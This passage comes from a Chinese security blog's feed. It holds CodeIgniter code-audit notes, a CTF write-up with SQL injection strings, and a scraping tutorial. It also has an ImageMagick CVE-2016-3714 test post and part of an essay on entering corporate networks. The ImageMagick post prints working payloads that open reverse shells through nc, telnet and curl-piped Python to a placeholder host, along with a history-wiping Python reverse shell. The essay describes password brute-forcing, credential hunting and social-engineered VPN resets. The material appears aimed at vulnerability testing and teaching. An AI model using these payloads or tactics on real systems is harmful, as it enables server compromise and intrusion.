<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$this->uri->uri_to_assoc([$n = <span class="number">3</span>[, $default = <span class="keyword">array</span>()]])</span><br></pre></td></tr></table></figure>
<p>该方法用于将 URI 的段转换为一个包含键值对的关联数组,第一个参数为位移,默认为3(前两段为控制器和方法)。如下URI <code>index.php/user/search/cid/1/sid/2</code><br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">array</span> (size=<span class="number">2</span>)</span><br><span class="line"> <span class="string">'sid'</span> => string <span class="string">'1'</span> (length=<span class="number">1</span>)</span><br><span class="line"> <span class="string">'cid'</span> => string <span class="string">'2'</span> (length=<span class="number">1</span>)</span><br></pre></td></tr></table></figure></p>
<p>这种方法获取参数也受permitted_uri_chars的影响。</p>
<h4 id="4-典型的PHP方法"><a href="#4-典型的PHP方法" class="headerlink" title="4. 典型的PHP方法"></a>4. 典型的PHP方法</h4><p>大家最熟悉的<code>$_GET[], $_POST[], $_POST[]</code>等。</p>
<h2 id="数据库操作"><a href="#数据库操作" class="headerlink" title="数据库操作"></a>数据库操作</h2><h4 id="1-基本查询"><a href="#1-基本查询" class="headerlink" title="1. 基本查询"></a>1. 基本查询</h4><p>在CI中提供了一个查询的类库database,需要手工去加载(autoload中未自动加载的话)<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$this->load->database()</span><br></pre></td></tr></table></figure></p>
<p>加载后,可以直接<code>$this->db->function</code>调用自带的方法了。</p>
<blockquote>
<p>常规查询,query($sql)</p>
</blockquote>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$this->db->query("select * from news where id = '".$id."'")</span><br></pre></td></tr></table></figure>
<p>加入单引号保护后,若变量直接传入仍然不安全。这时可用escape()方法进行转义,escape方法会自动引入单引号。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$this->db->query("select * from news where id = ".$this->db->escape($id))</span><br></pre></td></tr></table></figure></p>
<blockquote>
<p>参数绑定</p>
</blockquote>
<p>参数绑定会自动转义绑定的参数,生成安全的查询语句<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$sql = "SELECT * FROM some_table WHERE id = ? AND status = ? AND author = ?";</span><br><span class="line">$this->db->query($sql, array(3, 'live', 'Rick')); //传入索引数组</span><br></pre></td></tr></table></figure></p>
<h4 id="2-查询构造器"><a href="#2-查询构造器" class="headerlink" title="2. 查询构造器"></a>2. 查询构造器</h4><p>CodeIgniter 提供了查询构造器类,查询构造器允许你使用较少的代码来在数据库中 获取、新增或更新数据。有时只需要一两行代码就能完成数据库操作。构造器所有方法的定义位于/system/database/DB_query_builder.php。<br>比较常用的如下:<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">$this->db->get($table, $limit1, $limit2) <span class="comment">// select * from $table limit $limit1, $limit2</span></span><br><span class="line">$this->db->get_where(<span class="string">'mytable'</span>, <span class="keyword">array</span>(<span class="string">'id'</span> => $id), $limit, $offset); <span class="comment">// select * from mytable where id = $id limit $limit, $offset</span></span><br><span class="line">$this->db->insert(<span class="string">'mytable'</span>, $data); <span class="comment">//$data为数组</span></span><br><span class="line">$this->db->update(<span class="string">'mytable'</span>, $data) <span class="comment">//搭配下面的where语句设置条件</span></span><br><span class="line">$this->db->delete(<span class="string">'mytable'</span>, <span class="keyword">array</span>(<span class="string">'id'</span> => $id)); <span class="comment">//第二个参数也可用where语句代替</span></span><br></pre></td></tr></table></figure></p>
<p>部分sql语句编写,需要搭配<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">$this->db->select(<span class="string">'title, content, date'</span>); <span class="comment">//选择查询的字段</span></span><br><span class="line">$this->db->where(<span class="keyword">array</span>(<span class="string">'name'</span> => $name, <span class="string">'title'</span> => $title, <span class="string">'status'</span> => $status);); <span class="comment">// 查询条件设置</span></span><br><span class="line">$this->db->like(<span class="string">'title'</span>, <span class="string">'match'</span>); <span class="comment">// where `title` like '%match%'</span></span><br><span class="line">$this->db->order_by(<span class="string">'title'</span>, <span class="string">'DESC'</span>);</span><br><span class="line">$this->db->limit(<span class="number">10</span>, <span class="number">20</span>);</span><br><span class="line">.....</span><br></pre></td></tr></table></figure></p>
<h4 id="3-经典的php语句"><a href="#3-经典的php语句" class="headerlink" title="3. 经典的php语句"></a>3. 经典的php语句</h4><p>php的mysql扩展函数。</p>
<p>参考:</p>
<p><a href="http://codeigniter.org.cn/" target="_blank" rel="external">CodeIgniter 用户指南</a></p>
]]></content>
<summary type="html">
<p>对于代码审计来讲,比较重要的是了解其参数输入及数据库操作方式。在阅读了CI开发手册后,我总结了下面的笔记。<br>
</summary>
<category term="代码审计" scheme="http://wps2015.org/categories/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/"/>
<category term="编程" scheme="http://wps2015.org/tags/%E7%BC%96%E7%A8%8B/"/>
</entry>
<entry>
<title>whctf2016初赛Writeup(web&crypto)</title>
<link href="http://wps2015.org/2016/05/15/whctf-writeup-all/"/>
<id>http://wps2015.org/2016/05/15/whctf-writeup-all/</id>
<published>2016-05-14T16:00:00.000Z</published>
<updated>2016-12-23T02:21:48.128Z</updated>
<content type="html"><![CDATA[<p>whctf2016初赛提前结束了,团队的小伙伴们还是很给力的,做出了所有的web及几乎所有(差一道)的crypto题。<a id="more"></a></p>
<h2 id="Web题"><a href="#Web题" class="headerlink" title="Web题"></a>Web题</h2><p><strong>0x01. 信息</strong></p>
<p>打开是一个代码下载链接,下载下来是wireshark抓的cap包,打开包分析发现两个http的包,get请求下载了zip的压缩包,利用wireshark导出zip包-File-Export Objects-HTTP。发现需要密码打开,官方提示华科官网,解压密码<code>www.hust.edu.cn</code>,flag在flag3.docx中</p>
<p><strong>0x02. 窃取</strong></p>
<p>测试地址存在union注入,利用sqlmap在<strong>wh_ct4_hgduyingjkhjhjg</strong>库中发现flag的提示<code>flag is nothere,but I can tell you the flag is xor user's password.</code>,那么到<strong>web_sqli</strong>库中,将user1和user2的password异或后解密,得到flag:hust</p>
<p><strong>0x03. 忘了账户和密码</strong></p>
<p>username: <code>' union select 1,2,3-- -</code> , 三列</p>
<p>password: 任意</p>
<p><strong>0x04. find</strong></p>
<p>右键源代码,发现<br><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">css/[adwxhyz]{2}ctf[0-9]{7}.css"</span><br></pre></td></tr></table></figure></p>
<p>前两位字符,后7位数字的正则,大胆猜测前两位是wh,后7位直到官方给了提示(),一个qq号,搜索qq的资料,发现其为1999年5月12的生日,尝试css/whctf1999512.css成功,flag就在里面<code>whctf{Wh3tF_H@rd}</code></p>
<p><strong>0x05. beat it</strong></p>
<p>打开又是一个pcap的包下载,三个ipv4的协议包,尝试重组将中间的丢弃,把data组合hex两次转字符串,得到flag<code>whctf{000 here it is the flag 000}</code></p>
<p><strong>0x06. 密码忘了怎么办?</strong></p>
<p>登录口sql注入,还是union的,注入发现user表有flag字段,将12,13,14,15行的flag字段组合<br><code>whctf{hello$$##itisme&---&&&}</code></p>
<p><strong>0x07. 看图说话</strong></p>
<p>给的提示里ctf页面脚本,猜测存在ctf.php,打开是302跳转,返回包里有张图片链接<br><code>templates/images/xxx/ctf.jpg</code><br>,将图片下载下载利用notepad++打开,flag在最后<code>whctf{today@@isnot09#$tomorrow}</code></p>
<h2 id="CRYPTO题"><a href="#CRYPTO题" class="headerlink" title="CRYPTO题"></a>CRYPTO题</h2><p><strong>0x01 我叫李二狗(一)</strong><br>直接base64解密,然后李二狗是近视,将l换成1,x换成1,o换成0,解密发现是left16加密方式。</p>
<p><strong>0x02 李二狗的梦中情人</strong><br>将隐藏在图片末尾的链接中的图片提取出来,然后convert转换成png格式,diffimg下得到一个二维码,二维码黑白反转下,得到正确的二维码,扫一下,bingo</p>
<p><strong>0x03 我叫李二狗(二)</strong><br>给了两个RSA加密,由于其弱公钥,N太小,直接分解大数,破解</p>
<p><strong>0x04 李二狗的LOL战歌</strong><br>听音乐,感觉音频右声道像电报,然后翻译成摩斯编码,直接得到13位字符,然后用ROT13编码转换下,得到flag</p>
]]></content>
<summary type="html">
<p>whctf2016初赛提前结束了,团队的小伙伴们还是很给力的,做出了所有的web及几乎所有(差一道)的crypto题。
</summary>
<category term="CTF" scheme="http://wps2015.org/categories/CTF/"/>
<category term="ctf" scheme="http://wps2015.org/tags/ctf/"/>
</entry>
<entry>
<title>利用phantomjs+selenium抓取js执行后的结果</title>
<link href="http://wps2015.org/2016/05/12/Using-phantomjs%20+%20selenium-fetching-js-result-of-execution/"/>
<id>http://wps2015.org/2016/05/12/Using-phantomjs + selenium-fetching-js-result-of-execution/</id>
<published>2016-05-12T02:29:30.603Z</published>
<updated>2016-11-08T01:46:28.707Z</updated>
<content type="html"><![CDATA[<p>0x01 问题需求<br>有需要写一个接口需要可以抓取360webscan的网站评分及漏洞情况,本来以为一个简单的爬虫就能搞定的。哪想到把网页抓下来后一下子就懵逼了,先看获取分数的地方<a id="more"></a><br><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">$.ajax({ </span><br><span class="line"></span><br><span class="line"> url : <span class="string">"/webscore/index"</span>,</span><br><span class="line"></span><br><span class="line"> type: <span class="string">'POST'</span>,</span><br><span class="line"></span><br><span class="line"> dataType: <span class="string">'json'</span>,</span><br><span class="line"></span><br><span class="line"> data:<span class="string">'isxujia='</span>+isxujia+<span class="string">'&iscuangai='</span>+iscuangai+<span class="string">'&isviolation='</span>+isviolation+<span class="string">'&isguama='</span>+isguama+<span class="string">'&high='</span>+high+<span class="string">'&mid='</span>+mid+<span class="string">'&low='</span>+low+<span class="string">'&info='</span>+info+<span class="string">'&domain=www.natco.top&pangzhu='</span>+pangzhu,</span><br><span class="line"></span><br><span class="line"> success: <span class="function"><span class="keyword">function</span>(<span class="params">data</span>)</span>{</span><br></pre></td></tr></table></figure></p>
<p>先看这一段ajax请求,把url的参数连同isxujia(是否虚假)等参数向服务器请求后,获取得分。那么isxujia等参数从哪里来?再往上看<br><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">$.ajax({</span><br><span class="line"></span><br><span class="line"> url: <span class="string">"/index/gettrojan"</span>,</span><br><span class="line"></span><br><span class="line"> type:<span class="string">"POST"</span>,</span><br><span class="line"></span><br><span class="line"> dataType:<span class="string">"json"</span>,</span><br><span class="line"></span><br><span class="line"> data:<span class="string">"url="</span>+url+<span class="string">"&token=34e08ea449361738107148de883678c4&time=1462934864"</span>,</span><br><span class="line"></span><br><span class="line"> success: <span class="function"><span class="keyword">function</span>(<span class="params">data</span>)</span>{ </span><br><span class="line"></span><br><span class="line"> <span class="keyword">var</span> type = <span class="string">""</span>;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">var</span> st = <span class="string">""</span>;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">var</span> sc = <span class="string">""</span>;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">var</span> ssc = <span class="string">""</span>;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">var</span> trojan_list = <span class="string">""</span>;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">var</span> isxujia = <span class="number">0</span>;</span><br></pre></td></tr></table></figure></p>
<p>简单的看了下,就是这个ajax请求(带token)返回的type,st等参数经过一些条件判断,计算isxujia是否为1。由于有token,这个地方就没办法自己在python里将计算过程复现了。剩下的路就是要抓取js渲染过后的页面值了,网上最成熟的方法就是phantomjs+selenium。</p>
<hr>
<p>0x02 环境配置<br><strong>Selenium</strong>是一个用于Web应用程序测试的工具。Selenium测试直接运行在浏览器中,就像真正的用户在操作一样。支持的浏览器包括IE、Mozilla Firefox、Chrome等。<br><strong>Phantom JS</strong>是一个服务器端的 JavaScript API 的 WebKit。其支持各种Web标准: DOM 处理, CSS 选择器, JSON, Canvas, 和 SVG。<br>在kali2.0环境下,先安装Selenium: <code>sudo apt-get install selenium</code><br>再安装Phantom JS,官方网站下载页面:<a href="http://phantomjs.org/download.html" target="_blank" rel="external">传送门</a>,根据自己的系统版本下载,并配置<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">cd /usr/local/share</span><br><span class="line">sudo wget https://bitbucket.org/ariya/phantomjs/downloads/phantomjs-2.1.1-linux-x86_64.tar.bz2</span><br><span class="line">sudo tar -xvf phantomjs-2.1.1-linux-x86_64.tar.bz2</span><br><span class="line">sudo ln -s /usr/local/share/phantomjs-2.1.1-linux-x86_64/bin/phantomjs /usr/local/share/phantomjs</span><br><span class="line">sudo ln -s /usr/local/share/phantomjs-2.1.1-linux-x86_64/bin/phantomjs /usr/local/bin/phantomjs</span><br><span class="line">sudo ln -s /usr/local/share/phantomjs-2.1.1-linux-x86_64/bin/phantomjs /usr/bin/phantomjs</span><br></pre></td></tr></table></figure></p>
<p>0x03 demo<br>这里phantomjs的可执行路径为’/usr/bin/phantomjs’,下面是个小的demo<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#coding=utf-8</span></span><br><span class="line"><span class="keyword">from</span> selenium <span class="keyword">import</span> webdriver</span><br><span class="line"></span><br><span class="line">driver = webdriver.PhantomJS(executable_path=<span class="string">'/usr/bin/phantomjs'</span>) <span class="comment">#注意这里的执行路径</span></span><br><span class="line">driver.get(<span class="string">"http://phperz.com/"</span>)</span><br><span class="line">driver.find_element_by_id(<span class="string">'search_form_input_homepage'</span>).send_keys(<span class="string">'Nirvana'</span>)</span><br><span class="line">driver.find_element_by_id(<span class="string">"search_button_homepage"</span>).click()</span><br><span class="line"><span class="keyword">print</span> driver.current_url</span><br><span class="line">driver.quit() <span class="comment">#注意要退出</span></span><br></pre></td></tr></table></figure></p>
<p>主要是通过selenium获取js渲染后的dom节点的值。</p>
<p>参考链接:<br><a href="http://ohroot.com/2014/11/11/phantomjs%E5%B0%8F%E8%AF%95%E7%89%9B%E5%88%80/" target="_blank" rel="external">http://ohroot.com/2014/11/11/phantomjs%E5%B0%8F%E8%AF%95%E7%89%9B%E5%88%80/</a></p>
]]></content>
<summary type="html">
<p>0x01 问题需求<br>有需要写一个接口需要可以抓取360webscan的网站评分及漏洞情况,本来以为一个简单的爬虫就能搞定的。哪想到把网页抓下来后一下子就懵逼了,先看获取分数的地方
</summary>
<category term="编程之美" scheme="http://wps2015.org/categories/%E7%BC%96%E7%A8%8B%E4%B9%8B%E7%BE%8E/"/>
<category term="python" scheme="http://wps2015.org/tags/python/"/>
</entry>
<entry>
<title>ImageMagick 漏洞测试</title>
<link href="http://wps2015.org/2016/05/12/test-of-ImageMagick%7F/"/>
<id>http://wps2015.org/2016/05/12/test-of-ImageMagick/</id>
<published>2016-05-11T16:00:00.000Z</published>
<updated>2016-11-08T01:44:57.891Z</updated>
<content type="html"><![CDATA[<p>  5月3日,图像处理软件ImageMagick就被公布出一个严重的0day漏洞(CVE-2016-3714),攻击者通过此漏洞可执行任意命令,最终窃取重要信息取得服务器控制权。<a id="more"></a>由此漏洞延伸,ImageMagick被许多编程语言所支持,包括Perl,C++,PHP(通过imagick拓展),Python和Ruby等,并被部署在数以百万计的网站,博客,社交媒体平台和流行的内容管理系统(CMS),例如WordPress和Drupal。<br>  利用这个漏洞,可以通过上传一张含有恶意代码的图片,可导致命令执行。这里我们主要讲的是如何测试漏洞,可以写文件、反弹shell、wget等。本地搭建一个测试环境,在kali2.0中,lamp环境下,安装了php的imagick扩展,调用ImageMagick进行上传的图片处理<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="keyword">if</span> ($_FILES[<span class="string">"file"</span>][<span class="string">"error"</span>]> <span class="number">0</span>) {</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"Error: "</span> . $_FILES[<span class="string">"file"</span>][<span class="string">"error"</span>] . <span class="string">""</span>;</span><br><span class="line">}</span><br><span class="line"><span class="keyword">else</span> {</span><br><span class="line"> $temp_file = $_FILES[<span class="string">"file"</span>][<span class="string">"tmp_name"</span>];</span><br><span class="line"> $dest_file = <span class="string">"./images/"</span>.md5(uniqid(rand())).<span class="string">".png"</span>;</span><br><span class="line"> $thumb = <span class="keyword">new</span> Imagick();</span><br><span class="line"> $thumb->readImage($temp_file);</span><br><span class="line"> $thumb->writeImage($dest_file);</span><br><span class="line"> $thumb->clear();</span><br><span class="line"> $thumb->destroy();</span><br><span class="line"> unlink($temp_file);</span><br><span class="line"> <span class="keyword">echo</span> $dest_file;</span><br><span class="line">}</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure></p>
<p><strong>1. netcat</strong><br>前提是server服务器上安装了netcat,poc如下<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">push graphic-context</span><br><span class="line">viewbox 0 0 640 480</span><br><span class="line">fill 'url(https://example.com/image.jpg"|nc xxx.xxx.xxx.xxx 2015 -e /bin/bash")'</span><br><span class="line">pop graphic-context</span><br></pre></td></tr></table></figure></p>
<p>在反弹的监听主机上监听<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc -l -vv -p 2015</span><br></pre></td></tr></table></figure></p>
<p>测试处,点击上传后<br><img src="https://img.alicdn.com/imgextra/i1/792076116/TB2tD8LoFXXXXbNXFXXXXXXXXXX_!!792076116.png" alt=""><br><strong>2. telnet</strong><br>telnet在linux的各大发行版中telnet一般默认安装,poc如下<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">push graphic-context</span><br><span class="line">viewbox 0 0 640 480</span><br><span class="line">fill 'url(https://example.com/image.jpg"|telnet x.x.x.x 2015")'</span><br><span class="line">pop graphic-context</span><br></pre></td></tr></table></figure></p>
<p>在反弹的监听主机上监听,指令同上<br><img src="https://img.alicdn.com/imgextra/i2/792076116/TB2UKp5oFXXXXbIXpXXXXXXXXXX_!!792076116.png" alt=""><br><strong>3. curl&python</strong><br>利用curl下载python文件后,执行python脚本反弹<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">push graphic-context</span><br><span class="line">viewbox 0 0 640 480</span><br><span class="line">fill 'url(https://1"||curl -sS http://x.x.x.x/test.py | python")'</span><br><span class="line">pop graphic-contex</span><br></pre></td></tr></table></figure></p>
<p>这里需要一个外网服务器存放你的脚本,python脚本内容如下<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> os,socket,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((<span class="string">"x.x.x.x"</span>,<span class="number">2015</span>));os.dup2(s.fileno(),<span class="number">0</span>);os.dup2(s.fileno(),<span class="number">1</span>);os.dup2(s.fileno(),<span class="number">2</span>);os.unsetenv(<span class="string">"HISTFILE"</span>);os.unsetenv(<span class="string">"HISTFILESIZE"</span>);os.unsetenv(<span class="string">"HISTSIZE"</span>);os.unsetenv(<span class="string">"HISTORY"</span>);os.unsetenv(<span class="string">"HISTSAVE"</span>);os.unsetenv(<span class="string">"HISTZONE"</span>);os.unsetenv(<span class="string">"HISTLOG"</span>);os.unsetenv(<span class="string">"HISTCMD"</span>);os.putenv(<span class="string">"HISTFILE"</span>,<span class="string">"/dev/null"</span>);os.putenv(<span class="string">"HISTSIZE"</span>,<span class="string">"0"</span>);os.putenv(<span class="string">"HISTFILESIZE"</span>,<span class="string">"0"</span>);pty.spawn(<span class="string">"/bin/sh"</span>);s.close()</span><br></pre></td></tr></table></figure></p>
<p>注意更改脚本里的反弹ip和端口,测试成功<br><img src="https://img.alicdn.com/imgextra/i4/792076116/TB2v4GmoFXXXXb7XXXXXXXXXXXX_!!792076116.png" alt=""><br><strong>4. wget</strong><br>在远程服务上写个php脚本记录访问ip,<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line">$ip = $_SERVER[<span class="string">'REMOTE_ADDR'</span>];</span><br><span class="line">file_put_contents(<span class="string">"log.txt"</span>, <span class="string">"ping from "</span>.$ip, FILE_APPEND);</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure></p>
<p>poc如下<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">push graphic-context</span><br><span class="line">viewbox 0 0 640 480</span><br><span class="line">fill 'url(https://example.com/image.jpg"|wget http://x.x.x.x/img.php")'</span><br><span class="line">pop graphic-context</span><br></pre></td></tr></table></figure></p>
<p>命令执行成功,则在log.txt中会记录来访ip<br><img src="https://img.alicdn.com/imgextra/i2/792076116/TB2qROpoFXXXXblXpXXXXXXXXXX_!!792076116.png" alt=""></p>
]]></content>
<summary type="html">
<p>&emsp;&emsp;5月3日,图像处理软件ImageMagick就被公布出一个严重的0day漏洞(CVE-2016-3714),攻击者通过此漏洞可执行任意命令,最终窃取重要信息取得服务器控制权。
</summary>
<category term="漏洞分析" scheme="http://wps2015.org/categories/%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/"/>
<category term="poc" scheme="http://wps2015.org/tags/poc/"/>
</entry>
<entry>
<title>浅谈企业网络边界</title>
<link href="http://wps2015.org/2016/03/07/a-simple-discuss-of-enterprise-local-network/"/>
<id>http://wps2015.org/2016/03/07/a-simple-discuss-of-enterprise-local-network/</id>
<published>2016-03-06T16:00:00.000Z</published>
<updated>2016-11-08T01:44:46.748Z</updated>
<content type="html"><![CDATA[<h2 id="0x01-企业网络边界"><a href="#0x01-企业网络边界" class="headerlink" title="0x01 企业网络边界"></a>0x01 企业网络边界</h2><p>  我们知道既然要从外围进入内网,那么必然要做的一件事情就是跨越边界,所有这个命门我们也就自然应该在企业的内外网边界上来寻找。<a id="more"></a><br>  那为什么企业需要在内外网之间部署这样一个边界呢?我们只要作为一个大企业来说他会有上百甚至上千个业务线,而安全团队或许只有几十人,那这几十人要保证这上千个业务线的安全,显然如果用布点的方式肯定无法完成覆盖的,所以企业在思考如何进行防御的时候会选择区域性防守。<br>  所谓区域性防守就是把重点需要保护的业务&数据放到一个指定的区域,让后对这个区域进行隔离,并指定好进入这个区域的防火墙策略。然后定期对这个区域进行安全检查。<br>  如果这样实施的很好,看起来一切都很完美。但是事实上并不尽人意,事实是这样的,在企业内部通常业务部门是会比安全部门强势的,这一点我相信大家都知道,那么就会导致一个问题,安全部门总想着把业务圈起来,各种严格的策略和规范实施上去,而业务部门在业务快速迭代的背景下就会很难去严格执行你的策略。他们会要求你针对他特殊的业务场景来制定专门的策略,甚至部署到非隔离区域,而且这样的情况不在少数。如此一来安全部门需要维护的策略和规范就会越来越多。而这将直接导致策略及规范的执行越来越差。</p>
<h2 id="0x02-合法的入口"><a href="#0x02-合法的入口" class="headerlink" title="0x02 合法的入口"></a>0x02 合法的入口</h2><h3 id="1-物理接触"><a href="#1-物理接触" class="headerlink" title="1. 物理接触"></a>1. 物理接触</h3><p>  如果你能直接物理接触公司内网(插网线或者连接wifi),我只能说你牛B。案例:</p>
<ul>
<li><a href="http://www.wooyun.org/bugs/wooyun-2015-0108465" target="_blank" rel="external">看我如何用wifi万能钥匙物理撸穿京东漫游内网</a></li>
<li><a href="http://www.wooyun.org/bugs/wooyun-2010-0149911" target="_blank" rel="external">线下测试最终进入小米关键系统</a></li>
</ul>
<p>  这两个案例都是通过wifi万能钥匙(手机root后即可看到连接过的wifi密码),获取到wifi密码,直接连入内网。内网的系统安全性一般不高,或弱口令、xss、注入。甚至还可以进行嗅探、钓鱼及流量劫持等。</p>
<h3 id="2-非物理接触"><a href="#2-非物理接触" class="headerlink" title="2. 非物理接触"></a>2. 非物理接触</h3><p>  大型的公司,一般都会有很多的管理系统,如果每个系统都分配给员工账号的话,那么需要记住太多的账号密码了。所以大型公司通常有一个主账号,一般是OA系统、vpn或者统一认证入口,员工登录这个账号,可对其他的系统进行授权。这种方式虽然解放了员工,同时相对也比较安全(账号密码太多难免有弱口令)。但是凡事有利有弊,万一某一名员工的账号泄露或者是弱口令,那么它所授权的所有系统都可被攻击者访问。</p>
<h4 id="2-1-获取用户名密码的方式"><a href="#2-1-获取用户名密码的方式" class="headerlink" title="2.1 获取用户名密码的方式"></a>2.1 获取用户名密码的方式</h4><ul>
<li>用户名密码爆破</li>
</ul>
<p>   最常用方法当然是爆破。若统一认证处无法爆破,推荐爆破邮箱;若登录处有验证码,但是不复杂,推荐pkav的可识别简单验证码的爆破工具;若是ip限制,看是否是cookie记录限制,若不是又没有很多代理的话,还是放弃吧。对于用户名,最好是能收集到他们公司的一些人名或者是用户名,如果收集不到就使用自带的top500人名。密码一般top100。</p>
<p>参考:</p>
<blockquote>
<p><a href="http://www.wooyun.org/bugs/wooyun-2015-0133393" target="_blank" rel="external">中粮集团某处设计不当导致进入内网(可入多系统/泄露大量信息)</a><br><a href="http://www.wooyun.org/bugs/wooyun-2010-0165182" target="_blank" rel="external">途牛内网漫游(内网大量数据库权限/大量用户信息/天猫商城、积分商城及主站后台权限)</a></p>
</blockquote>
<ul>
<li>社工(github、社工库)</li>
</ul>
<p>   都说现在是大数据的时代,社工永远是个有效方法。程序猿们一不小心把代码传到github上,代码里恰巧有邮箱,密码等信息,很容易被攻击者搜索到。常用语法,以饿了么为例<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">smtp ele.me</span><br><span class="line">ele.me pass</span><br><span class="line">mail @ele.me</span><br><span class="line">.......</span><br></pre></td></tr></table></figure></p>
<p>   拥有大数据,直接在社工库里搜索某公司的企业邮箱域名,如@ele.me。有的人虽然密码挺复杂,但如果是万年一个密码,也是相当的危险。<br>参考:</p>
<blockquote>
<p><a href="http://www.wooyun.org/bugs/wooyun-2010-0147179" target="_blank" rel="external">美团网某处内部邮箱账号泄露可登录(已连接vpn)</a></p>
</blockquote>
<ul>
<li>密码重置</li>
</ul>
<p>   试想如果员工想更改自己的vpn密码,那么有什么好的方法呢?如果不是要员工直接走到运维办公室里,出示证件的话,那么就一定有东西可被两方信任,通常是邮箱+个人信息。如果我直接发邮件给运维,说我vpn密码忘记了,再出示一些个人信息,你说运维会不会给我改?<br>参考:</p>
<blockquote>
<p><a href="http://www.wooyun.org/bugs/wooyun-2015-0150946" target="_blank" rel="external">华润双鹤由邮箱到集团内网漫游</a><br><a href="http://www.wooyun.org/bugs/wooyun-2015-0150613" target="_blank" rel="external">控制魅族在线商店突破vpn双因素进入内网(涉及大量用户详细订单/手机IMEI等)</a></p>
</blockquote>
<h4 id="2-2-谈谈用户名和密码"><a href="#2-2-谈谈用户名和密码" class="headerlink" title="2.2 谈谈用户名和密码"></a>2.2 谈谈用户名和密码</h4><ul>
<li>用户名</li>
</ul>
